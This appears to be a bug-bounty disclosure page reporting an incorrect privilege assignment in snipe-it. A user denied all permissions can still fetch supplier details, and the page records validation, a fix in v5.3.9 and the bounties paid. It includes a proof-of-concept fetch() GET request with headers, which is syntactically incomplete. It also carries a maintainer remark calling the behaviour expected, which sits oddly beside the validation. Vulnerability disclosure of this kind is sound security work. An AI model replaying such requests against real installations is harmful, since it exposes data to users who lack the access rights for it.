Incorrect Privilege Assignment in snipe/snipe-it


Reported on

Feb 10th 2022


unprivileged user can get supplier

Proof of Concept

1. Create regular user and set DENY to all permissions in asset and supplier models.
2. Login as the user and sent bellow request to get supplier

await fetch("", {
    "credentials": "include",
    "headers": {
        "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:92.0) Gecko/20100101 Firefox/92.0",
        "Accept": "application/json, text/javascript, */*; q=0.01",
        "Accept-Language": "en-US,en;q=0.5",
        "X-Requested-With": "XMLHttpRequest",
        "X-CSRF-TOKEN": "hIQIBHcol9LRTCbEOt3zGSAxXmRMvAOXpnxtMzwy",
        "Sec-Fetch-Dest": "empty",
        "Sec-Fetch-Mode": "cors",
        "Sec-Fetch-Site": "same-origin"
    "referrer": "",
    "method": "GET",
    "mode": "cors"


unprivileged user can get supplier details

We are processing your report and will contact the snipe/snipe-it team within 24 hours. a year ago
We have contacted a member of the snipe/snipe-it team and are waiting to hear back a year ago
a year ago


That's expected behavior

snipe validated this vulnerability a year ago
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs
snipe marked this as fixed in v.5.3.9 with commit 10c26f a year ago
snipe has been awarded the fix bounty
This vulnerability will not receive a CVE
to join this conversation